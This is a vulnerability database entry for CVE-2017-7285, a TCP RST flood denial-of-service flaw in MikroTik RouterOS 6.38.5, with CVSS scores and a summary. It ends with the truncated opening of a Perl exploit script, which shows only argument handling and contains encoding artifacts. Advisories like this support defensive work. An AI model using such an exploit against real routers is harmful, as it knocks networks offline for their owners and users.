7.8
CVSSv2

CVE-2017-7285

Published: 29/03/2017 Updated: 10/04/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

A vulnerability in the network stack of MikroTik Version 6.38.5 released 2017-03-09 could allow an unauthenticated remote malicious user to exhaust all available CPU via a flood of TCP RST packets, preventing the affected router from accepting new TCP connections.

Vulnerable Product Search on Vulmon Subscribe to Product

mikrotik routeros 6.38.5

Exploits

#!/usr/local/bin/perl use Socket; $src_host =3D $ARGV[0];=20 $src_port =3D $ARGV[1];=20 $dst_host =3D $ARGV[2];=20 $dst_port =3D $ARGV[3];=20 if(!defined $src_host or !defined $src_port or !defined $dst_host or !defin= ed $dst_port)=20 { =09 =09print "Usage: $0 <source host> <source port> <dest host> <dest port>\n"; =09ex ...